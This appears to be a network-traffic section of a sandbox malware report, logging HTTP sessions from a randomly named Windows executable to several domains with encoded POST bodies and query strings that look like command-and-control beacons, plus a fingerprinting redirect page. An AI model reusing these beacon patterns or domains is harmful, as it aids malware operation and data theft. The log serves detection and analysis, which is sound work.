Nov 15, 2024 04:23:03.537136078 CET	10898	OUT	POST /3m3e/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.klohk.tech Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.klohk.tech Referer: http://www.klohk.tech/3m3e/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 77 4e 59 52 49 2f 47 66 35 68 79 32 65 65 66 58 37 67 35 69 2f 6e 45 37 44 66 64 32 39 45 42 39 56 69 61 71 53 45 73 69 38 2f 78 57 61 49 4d 4e 44 47 6a 48 79 6f 6f 59 49 36 51 46 48 49 42 61 47 7a 58 4e 69 43 73 73 4f 75 6b 78 66 6c 70 71 70 68 4d 70 75 41 71 34 4f 53 62 54 38 5a 6f 61 78 4a 64 52 65 32 36 55 35 65 49 51 61 62 30 6e 32 6b 73 7a 54 74 54 71 72 4b 70 2f 2b 56 68 76 67 32 79 30 51 37 61 57 2b 49 6b 63 68 78 65 66 63 63 6f 38 6f 79 35 7a 52 68 4f 5a 2f 37 31 71 45 70 50 6c 79 64 56 2b 44 4d 49 50 53 65 72 6c 68 6b 52 46 59 34 6a 4e 4a 51 35 52 4b 78 70 74 33 49 36 76 69 35 34 5a 47 6b 4a 2b 46 75 65 58 61 79 4e 2f 51 41 39 4f 57 5a 64 52 2f 33 50 54 75 32 52 58 71 62 4e 53 64 6d 42 6b 44 72 42 61 6f 64 38 4e 7a 59 59 49 47 30 61 62 5a 2b 41 43 77 74 39 67 4e 4f 72 54 79 30 44 47 4c 45 43 32 64 75 55 64 51 58 51 58 51 63 31 39 48 66 69 51 57 36 4a 4c 66 59 75 50 63 38 6e 6b 62 33 75 54 34 6c 2f 72 2b 4d 31 7a 69 67 78 41 78 55 79 [TRUNCATED] Data Ascii: R4qXin=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EB9ViaqSEsi8/xWaIMNDGjHyooYI6QFHIBaGzXNiCssOukxflpqphMpuAq4OSbT8ZoaxJdRe26U5eIQab0n2kszTtTqrKp/+Vhvg2y0Q7aW+Ikchxefcco8oy5zRhOZ/71qEpPlydV+DMIPSerlhkRFY4jNJQ5RKxpt3I6vi54ZGkJ+FueXayN/QA9OWZdR/3PTu2RXqbNSdmBkDrBaod8NzYYIG0abZ+ACwt9gNOrTy0DGLEC2duUdQXQXQc19HfiQW6JLfYuPc8nkb3uT4l/r+M1zigxAxUycQ4LDfol6VUoE3Kcin6tsV4rOzol6+w8BsPaj8KLlh+WqpO16HI3y/VjkdxX/sU8Gd8HSj6abd3rQMB16YDgpioaGczpE+85h5geslHe51Bmw+h9oFHC4LgUJVXNqMoz67+lpqxC9YWuVimGc4v9jJtJu8CU/euPCqvyfaf06pdKOjDIKNU08RGXm2Cic1QMg0DUDutoWpTvhYsnBA+VZjWTQLcgOEuZ9tLCYf8TvXcFJZnWREW1MmjqXZQV39EaaHIVwvVVemvG7GuypgpxNRzyaChkSCbbVnCgBYsUkcj4Qvd+2TEyArmFzrOo261Qkj6LYu2HNgXhJ4F++1mkW0Dw1H0nUcz2QWO6dhRBWSC44hgjfpzWpDJjqTnSIPkRCBOckJfwXx7HXCXbDkAAVgxfci09TGZaUu1XWKfSZRAcm7RBS27eUx3fN2McLDDOVM0kIUT/cRtZ/8wZIu/fr3a6c7RcJbT58sDrSG21gCTZ9Zc4W876K2hCunfdmxvWOXs6zMpe/DMcWDMZEcHgrY7UvVUu/SnlAZLhp6w5afbzMJiySoO21EuR+YtnBYO/d2VFlFll5jS91hzHYf+rGH73VrzmFWCTmsnbxGqnZOWPRILnb1IBPIhBcZ8k+aKfeCBgv1UhPH0uJm47mRkOAfE0+q54eYAFsV [TRUNCATED]
Nov 15, 2024 04:23:04.220201015 CET	871	IN	HTTP/1.1 200 OK date: Fri, 15 Nov 2024 03:23:04 GMT server: Apache set-cookie: __tad=1731640984.4905667; expires=Mon, 13-Nov-2034 03:23:04 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED] Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49820	103.224.182.242	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:06.079778910 CET	540	OUT	GET /3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNdpOWkpvpmQUiiaCEh/01bYK5u1RRn/kwMI=&A69pk=_b0Tr07p9f0pn HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.klohk.tech Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 15, 2024 04:23:06.737200975 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 15 Nov 2024 03:23:06 GMT server: Apache set-cookie: __tad=1731640986.7837855; expires=Mon, 13-Nov-2034 03:23:06 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 1496 content-type: text/html; charset=UTF-8 connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6b 6c 6f 68 6b 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6c 6f 68 6b 2e 74 65 63 68 2f 33 6d 33 65 2f 3f 52 34 71 58 69 6e 3d 41 47 38 77 6b 63 31 32 44 34 4f 34 71 66 45 77 41 73 32 6a 75 56 4b 51 63 39 72 53 78 68 52 75 2b 30 6b 36 45 74 46 62 35 55 6c 75 66 51 2b 6c 56 58 46 52 2f 39 67 65 50 70 51 6a 43 47 4b 61 2f 5a 73 51 4a 34 4d 59 4b 63 4a 6d 41 78 72 66 6a 6c 34 63 4e 64 70 4f 57 6b 70 76 70 6d 51 55 69 69 61 43 45 68 2f 30 31 62 59 4b 35 75 31 52 52 6e 2f 6b 77 4d 49 3d 26 41 36 39 70 6b 3d 5f 62 30 54 72 30 37 70 [TRUNCATED] Data Ascii: <html><head><title>klohk.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.klohk.tech/3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNdpOWkpvpmQUiiaCEh/01bYK5u1RRn/kwMI=&A69pk=_b0Tr07p9f0pn&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#fffff
Nov 15, 2024 04:23:06.737241030 CET	532	IN	Data Raw: 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6c 6f 68 6b 2e 74 65 63 68 2f 33 6d 33 65 Data Ascii: f" text="#000000"><div style='display: none;'><a href='http://www.klohk.tech/3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNdpOWkpvpmQUiiaCEh/01bYK5u1RRn/kwMI=&A69pk=_b0Tr07p9f0pn&fp=-3'>Clic

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49821	154.23.184.218	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:12.439379930 CET	793	OUT	POST /rqnz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.d63dm.top Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.d63dm.top Referer: http://www.d63dm.top/rqnz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 61 66 6f 73 42 6b 32 31 64 2f 51 45 53 44 4e 43 6a 79 46 4c 57 38 33 37 47 37 77 48 33 2f 44 44 68 7a 43 5a 52 31 4e 38 43 58 74 67 2b 67 4b 2b 34 4f 6d 37 74 73 71 65 33 62 4d 68 4f 62 49 33 38 50 76 7a 37 46 61 55 6a 61 30 2f 62 66 53 47 56 39 2b 2b 57 4a 42 6b 68 4a 6f 2b 6f 39 56 78 76 7a 65 39 72 68 70 67 36 2b 76 4b 4f 68 61 50 62 54 79 73 4b 35 70 5a 4f 73 74 32 32 42 38 69 54 45 4d 68 44 48 55 7a 4f 53 4a 4c 6a 59 6c 65 52 44 49 6d 50 2b 46 52 69 6a 4e 69 59 32 69 39 33 2f 74 58 39 48 61 58 37 71 6f 52 77 43 5a 45 6b 56 48 59 65 77 3d 3d Data Ascii: R4qXin=24JOOXJ8e4hNafosBk21d/QESDNCjyFLW837G7wH3/DDhzCZR1N8CXtg+gK+4Om7tsqe3bMhObI38Pvz7FaUja0/bfSGV9++WJBkhJo+o9Vxvze9rhpg6+vKOhaPbTysK5pZOst22B8iTEMhDHUzOSJLjYleRDImP+FRijNiY2i93/tX9HaX7qoRwCZEkVHYew==
Nov 15, 2024 04:23:13.615916014 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 15 Nov 2024 03:23:13 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "669137aa-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49822	154.23.184.218	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:14.999381065 CET	813	OUT	POST /rqnz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.d63dm.top Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.d63dm.top Referer: http://www.d63dm.top/rqnz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 62 2f 59 73 4f 6c 32 31 49 50 51 48 64 6a 4e 43 6f 53 46 50 57 38 72 37 47 36 45 58 33 73 6e 44 68 53 79 5a 51 78 5a 38 46 58 74 67 78 41 4b 33 31 75 6d 4b 74 73 57 57 33 61 41 68 4f 62 73 33 38 4f 66 7a 34 79 47 54 69 4b 30 35 55 2f 53 45 4b 74 2b 2b 57 4a 42 6b 68 4a 73 59 6f 39 74 78 76 6d 4f 39 78 45 56 6a 30 65 76 4a 65 78 61 50 4b 44 79 6f 4b 35 70 6e 4f 74 68 50 32 48 67 69 54 41 49 68 44 56 38 77 46 53 4a 4e 73 34 6c 41 58 7a 68 71 41 73 59 72 67 54 4d 48 64 6e 61 67 79 35 67 4e 73 32 37 41 70 71 4d 69 74 46 51 77 70 57 36 52 46 78 57 35 54 54 58 43 65 36 57 74 56 62 63 79 30 7a 44 58 59 79 59 3d Data Ascii: R4qXin=24JOOXJ8e4hNb/YsOl21IPQHdjNCoSFPW8r7G6EX3snDhSyZQxZ8FXtgxAK31umKtsWW3aAhObs38Ofz4yGTiK05U/SEKt++WJBkhJsYo9txvmO9xEVj0evJexaPKDyoK5pnOthP2HgiTAIhDV8wFSJNs4lAXzhqAsYrgTMHdnagy5gNs27ApqMitFQwpW6RFxW5TTXCe6WtVbcy0zDXYyY=
Nov 15, 2024 04:23:15.956135988 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 15 Nov 2024 03:23:15 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "669137aa-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49823	154.23.184.218	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:17.558007956 CET	10895	OUT	POST /rqnz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.d63dm.top Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.d63dm.top Referer: http://www.d63dm.top/rqnz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 62 2f 59 73 4f 6c 32 31 49 50 51 48 64 6a 4e 43 6f 53 46 50 57 38 72 37 47 36 45 58 33 73 76 44 67 67 4b 5a 66 32 31 38 45 58 74 67 76 77 4b 36 31 75 6d 58 74 73 2b 53 33 61 63 62 4f 5a 45 33 39 73 48 7a 76 7a 47 54 73 36 30 35 52 50 53 48 56 39 2b 52 57 49 78 67 68 4a 63 59 6f 39 74 78 76 6e 2b 39 2f 42 70 6a 32 65 76 4b 4f 68 61 39 62 54 7a 50 4b 36 59 63 4f 74 31 41 32 52 51 69 64 41 59 68 46 6d 55 77 49 53 4a 50 6c 6f 6b 54 58 7a 38 6f 41 73 56 46 67 51 52 73 64 6e 2b 67 7a 34 46 38 78 30 76 5a 2f 72 4e 2b 33 45 70 54 77 31 43 4e 44 67 57 79 56 67 44 48 41 4a 4f 56 56 59 31 6c 32 42 37 64 48 46 4a 48 77 74 6e 56 5a 76 36 36 52 6e 65 53 7a 65 38 4c 51 33 74 66 37 64 70 50 44 33 47 43 57 7a 72 52 76 65 4b 66 59 76 4a 6e 71 61 62 38 64 64 55 72 32 31 6c 54 4b 65 6c 61 67 49 50 47 51 59 77 59 36 73 30 77 73 67 57 55 37 39 6a 32 72 4f 37 34 59 63 79 52 55 46 50 4d 32 2b 39 79 6a 53 4d 49 79 74 38 56 6c 77 36 38 42 35 46 52 36 70 62 50 5a 71 64 [TRUNCATED] Data Ascii: R4qXin=24JOOXJ8e4hNb/YsOl21IPQHdjNCoSFPW8r7G6EX3svDggKZf218EXtgvwK61umXts+S3acbOZE39sHzvzGTs605RPSHV9+RWIxghJcYo9txvn+9/Bpj2evKOha9bTzPK6YcOt1A2RQidAYhFmUwISJPlokTXz8oAsVFgQRsdn+gz4F8x0vZ/rN+3EpTw1CNDgWyVgDHAJOVVY1l2B7dHFJHwtnVZv66RneSze8LQ3tf7dpPD3GCWzrRveKfYvJnqab8ddUr21lTKelagIPGQYwY6s0wsgWU79j2rO74YcyRUFPM2+9yjSMIyt8Vlw68B5FR6pbPZqdY1HPAkmijzS2YiOyp/I6BzCR9KDdezEU4gl6eVH9mC8rQAZc1igfIM6cXu9rsa2PAQyZSq4aFyF3o0OqJ560Bx2XyjEd/Fkh8mzVhIICgesPGBvC1SHzLYNKqkrvs1OdxlL0+JIQMcR/J4NIxzmrytpIuCWA+1INugN6rlXDIesC9vtkK6CidfAZUde65vSdXpTFGzheF9or95flSFLOfxaCpnEAnbtqsL6u5qaDqw++pM/gr7tnREa4qHA4e4hxXrg4woyWjvChUN+QXIAP7/IEfwGU++GcU68EivL9sgMFtoQ1tOkZbZbFbw2GXHXse/uAiPfqSuhh0b6of1fxPA2OypNL2Mlc5/6L0hfK+ZgN5H+l0F41NdRE6fBwU1p6fw8uB6rCRSbiolZJKFgM7jf7/aKoIBWBfYXWDGco3uz8PC1qXC6B/6iohs/8mCcA+EtN3Fc79hpwLWG9T6K+HnzqdGkd8QpCda+aJA4xp6Z29aujSK8CuPqmM8ke1fJGUBtXLpD0xS+HNim+PH0zvAGVFci0FDwA2nxhokWw/dc/7I4BoEZWKlKiFVRNCeT1KwGvU7gTM/BPoTQpoEKH8x0Oqu6wBFSGd7YO+pCBryBQ26ttXUWJ2qmSXAiVQx0epBmDdUIPFCcgMlc3Bw+flV28ul7GzFSiyN [TRUNCATED]
Nov 15, 2024 04:23:18.705276966 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 15 Nov 2024 03:23:18 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "669137aa-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49824	154.23.184.218	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:20.113596916 CET	539	OUT	GET /rqnz/?R4qXin=76huNjt+Arc+fPcFGkrGedsPXjdBvzRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tbMSaPOALNuAB6ZkqasdgIxv5yPN3CQ/0Z4=&A69pk=_b0Tr07p9f0pn HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.d63dm.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 15, 2024 04:23:21.060811996 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 15 Nov 2024 03:23:20 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "669137aa-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49825	31.31.196.17	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:26.560118914 CET	808	OUT	POST /h26k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.servannto.site Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.servannto.site Referer: http://www.servannto.site/h26k/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4b 66 4a 4c 57 45 76 65 64 2b 44 72 46 65 77 37 58 44 7a 4d 56 4f 75 51 44 57 59 43 78 6b 47 70 6f 33 33 44 75 46 35 67 36 2b 58 35 64 73 45 42 46 69 52 42 45 35 2f 79 55 6f 52 4e 4c 4f 4e 66 76 35 78 68 44 6f 79 2f 44 59 65 6a 37 52 6f 35 51 59 61 65 4e 50 50 32 4b 59 4f 39 73 7a 53 6a 4e 78 77 66 6f 77 75 64 6c 32 47 4a 6a 32 38 7a 7a 46 4f 57 31 57 34 36 72 76 70 2b 43 65 35 55 71 30 6e 54 35 46 38 4f 36 69 4d 68 54 79 57 2f 2f 72 75 2b 74 4c 79 4d 6c 56 68 54 46 59 63 30 74 32 59 4a 42 5a 44 65 4c 56 41 49 4d 63 75 43 50 4c 49 78 6a 51 3d 3d Data Ascii: R4qXin=6DLu6QMM1jamKfJLWEved+DrFew7XDzMVOuQDWYCxkGpo33DuF5g6+X5dsEBFiRBE5/yUoRNLONfv5xhDoy/DYej7Ro5QYaeNPP2KYO9szSjNxwfowudl2GJj28zzFOW1W46rvp+Ce5Uq0nT5F8O6iMhTyW//ru+tLyMlVhTFYc0t2YJBZDeLVAIMcuCPLIxjQ==
Nov 15, 2024 04:23:27.460443974 CET	375	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 15 Nov 2024 03:23:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
